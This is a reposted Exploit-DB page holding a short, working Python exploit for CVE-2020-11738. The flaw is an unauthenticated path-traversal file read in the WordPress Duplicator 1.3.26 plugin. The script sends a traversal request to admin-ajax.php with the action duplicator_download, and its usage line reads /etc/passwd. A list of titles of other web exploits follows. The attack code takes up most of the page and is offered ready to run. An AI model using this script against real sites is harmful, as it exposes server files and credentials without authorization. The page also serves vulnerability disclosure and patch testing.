WordPress Plugin Duplicator 1.3.26 – Unauthenticated Arbitrary File Read

Exploit Database
18 阅读

作者： nam3lum

日期： 2021-10-18
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/50420/

# Exploit Title: WordPress Plugin Duplicator 1.3.26 - Unauthenticated Arbitrary File Read
# Date: October 16, 2021
# Exploit Author: nam3lum
# Vendor Homepage: https://wordpress.org/plugins/duplicator/
# Software Link: https://downloads.wordpress.org/plugin/duplicator.1.3.26.zip]
# Version: 1.3.26
# Tested on: Ubuntu 16.04
# CVE : CVE-2020-11738

import requests as re
import sys

if len(sys.argv) != 3:
print("Exploit made by nam3lum.")
print("Usage: CVE-2020-11738.py http://192.168.168.167 /etc/passwd")
exit()

arg = sys.argv[1]
file = sys.argv[2]

URL = arg + "/wp-admin/admin-ajax.php?action=duplicator_download&file=../../../../../../../../.." + file

output = re.get(url = URL)
print(output.text)

last Exploits
WordPress Plugin Duplicator 1.3.26 – Unauthenticated Arbitrary File Read的更多信息

BSI Advance Hotel Booking System 1.0 – SQL Injection：
WordPress Plugin Stop Spammers 2021.8 – ‘log’ Reflected Cross-site Scripting (XSS)：
Link Protect 1.2 – Persistent Cross-Site Scripting：
Affiliate Me Version 5.0.1 – SQL Injection：
EncapsCMS 0.3.6 – ‘config[path]’ Remote File Inclusion：
Lokomedia CMS – ‘sukaCMS’ Local File Disclosure：
FileExecutive 1 – Multiple Vulnerabilities：
FlatnuX CMS – Cross-Site Request Forgery (Add Admin)：